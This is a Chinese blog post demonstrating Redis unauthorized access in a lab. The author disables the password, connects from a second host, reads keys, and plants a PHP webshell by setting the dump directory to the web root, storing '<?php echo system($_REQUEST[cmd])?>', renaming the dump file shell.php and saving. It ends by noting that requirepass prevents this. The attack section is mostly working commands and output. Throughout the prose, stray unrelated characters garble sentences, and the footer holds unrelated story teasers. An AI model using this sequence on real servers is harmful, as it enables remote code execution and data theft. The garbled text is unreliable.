redis未授權(quán)訪問簡介

Redis是一個(gè)開源的使用ANSI C語言編寫援岩、支持網(wǎng)絡(luò)歼狼、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫享怀,并提供多種語言的API羽峰。從2010年3月15日起,Redis的開發(fā)工作由VMware主持添瓷。從2013年5月開始梅屉,Redis的開發(fā)由Pivotal贊助。

redis是一個(gè)key-value存儲(chǔ)系統(tǒng)鳞贷。和Memcached類似坯汤,它支持存儲(chǔ)的value類型相對更多,包括string(字符串)搀愧、list(鏈表)惰聂、set(集合)、zset(sorted set –有序集合)和hash(哈希類型)咱筛。這些數(shù)據(jù)類型都支持push/pop搓幌、add/remove及取交集并集和差集及更豐富的操作,而且這些操作都是原子性的迅箩。在此基礎(chǔ)上溉愁,redis支持各種不同方式的排序。與memcached一樣沙热,為了保證效率叉钥,數(shù)據(jù)都是緩存在內(nèi)存中。區(qū)別的是redis會(huì)周期性的把更新的數(shù)據(jù)寫入磁盤或者把修改操作寫入追加的記錄文件篙贸,并且在此基礎(chǔ)上實(shí)現(xiàn)了master-slave(主從)同步投队。

之前看SRC刷過Redis未授權(quán)訪問的漏洞

redis_0x1-2.png

那么下面我來揭開它的神秘面紗!

首先我下載了安裝包爵川。

redis_0x2.png

[ — 安裝過程 自行百度 –]

安裝好以后敷鸦,我們啟動(dòng)redis服務(wù):

/usr/share/redis/bin/redis-server /etc/redis.conf
vim /etc/redis.conf

在181行左右 我先注釋訪問密碼。

然后啟動(dòng)redis-server

[root@localhost 桌面]# ps -A | grep redis
 3931 ?        00:00:00 redis-server

首先我先用客戶端連接服務(wù)器:

[root@localhost 桌面]# redis-cli 
redis 127.0.0.1:6379> keys *
1) "about"
2) "user:id1"
3) "user:id2"
4) "admin"
5) "str"
redis 127.0.0.1:6379> get str
"ldjskjdsahdsaa"
redis 127.0.0.1:6379> 

可以看到能直接操作數(shù)據(jù)庫寝贡。

下面我用另外一臺(tái)服務(wù)器做安全測試

[root@localhost 桌面]# redis-cli -h 10.10.3.215
redis 10.10.3.215:6379> keys *
1) "about"
2) "user:id1"
3) "user:id2"
4) "admin"
5) "str"
redis 10.10.3.215:6379> 

發(fā)現(xiàn)也是可以直接操作數(shù)據(jù)庫

根據(jù)redis語句我們寫webshell….

前提是知道絕對路徑扒披,當(dāng)然也可以用語句判斷。

redis 10.10.3.215:6379> CONFIG SET dir /var/wwwroot/
(error) ERR Changing directory: No such file or directory

可以發(fā)現(xiàn)不存在圃泡,那么就可以猜解目錄了碟案。

下面我演示寫webshell

redis 10.10.3.215:6379> CONFIG SET dir /usr/share/apache/htdocs/ #這里是站點(diǎn)絕對路徑
OK
redis 10.10.3.215:6379> set shell "<?php echo system($_REQUEST[cmd])?>"
OK
redis 10.10.3.215:6379> CONFIG SET dbfilename shell.php
OK
redis 10.10.3.215:6379> save  #將內(nèi)存中的數(shù)據(jù)保存到dbfilename中
OK
redis 10.10.3.215:6379> 

這樣就getshell了

redis_0x4.png

下面看看這個(gè)未授權(quán)原因
在剛才的配置文件中,有一個(gè)選項(xiàng)
設(shè)置客戶端連接后進(jìn)行任何其他指定前需要使用的密碼颇蜡。
警告:因?yàn)閞edis速度相當(dāng)快价说,所以在一臺(tái)比較好的服務(wù)器下辆亏,一個(gè)外部的用戶可以在一秒鐘進(jìn)行150K次的密碼嘗試,這意味著你需要指定非常非常強(qiáng)大的密碼來防止暴力破解
requirepass [密碼]
所以必須設(shè)置密碼鳖目。
出現(xiàn)這類漏洞就是 配置不得當(dāng)導(dǎo)致控制系統(tǒng) 執(zhí)行任意代碼 再深入還可以威脅主從服務(wù)器 及其他的數(shù)據(jù)庫服務(wù)器扮叨。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市领迈,隨后出現(xiàn)的幾起案子彻磁,更是在濱河造成了極大的恐慌,老刑警劉巖狸捅,帶你破解...
    沈念sama閱讀 206,378評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件衷蜓,死亡現(xiàn)場離奇詭異,居然都是意外死亡薪贫,警方通過查閱死者的電腦和手機(jī)恍箭,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,356評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來瞧省,“玉大人扯夭,你說我怎么就攤上這事“柏遥” “怎么了交洗?”我有些...
    開封第一講書人閱讀 152,702評論 0 342
  • 文/不壞的土叔 我叫張陵,是天一觀的道長橡淑。 經(jīng)常有香客問我构拳,道長,這世上最難降的妖魔是什么梁棠? 我笑而不...
    開封第一講書人閱讀 55,259評論 1 279
  • 正文 為了忘掉前任置森,我火速辦了婚禮,結(jié)果婚禮上符糊,老公的妹妹穿的比我還像新娘凫海。我一直安慰自己,他們只是感情好男娄,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,263評論 5 371
  • 文/花漫 我一把揭開白布行贪。 她就那樣靜靜地躺著,像睡著了一般模闲。 火紅的嫁衣襯著肌膚如雪建瘫。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,036評論 1 285
  • 那天尸折,我揣著相機(jī)與錄音啰脚,去河邊找鬼。 笑死实夹,一個(gè)胖子當(dāng)著我的面吹牛橄浓,可吹牛的內(nèi)容都是我干的晾咪。 我是一名探鬼主播,決...
    沈念sama閱讀 38,349評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼贮配,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了塞赂?” 一聲冷哼從身側(cè)響起泪勒,我...
    開封第一講書人閱讀 36,979評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎宴猾,沒想到半個(gè)月后圆存,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,469評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡仇哆,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,938評論 2 323
  • 正文 我和宋清朗相戀三年沦辙,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片讹剔。...
    茶點(diǎn)故事閱讀 38,059評論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡油讯,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出延欠,到底是詐尸還是另有隱情陌兑,我是刑警寧澤,帶...
    沈念sama閱讀 33,703評論 4 323
  • 正文 年R本政府宣布由捎,位于F島的核電站兔综,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏狞玛。R本人自食惡果不足惜软驰,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,257評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望心肪。 院中可真熱鬧锭亏,春花似錦、人聲如沸蒙畴。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,262評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽膳凝。三九已至碑隆,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間蹬音,已是汗流浹背上煤。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留著淆,地道東北人劫狠。 一個(gè)月前我還...
    沈念sama閱讀 45,501評論 2 354
  • 正文 我出身青樓拴疤,卻偏偏與公主長得像,于是被迫代替她去往敵國和親独泞。 傳聞我的和親對象是個(gè)殘疾皇子呐矾,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,792評論 2 345

推薦閱讀更多精彩內(nèi)容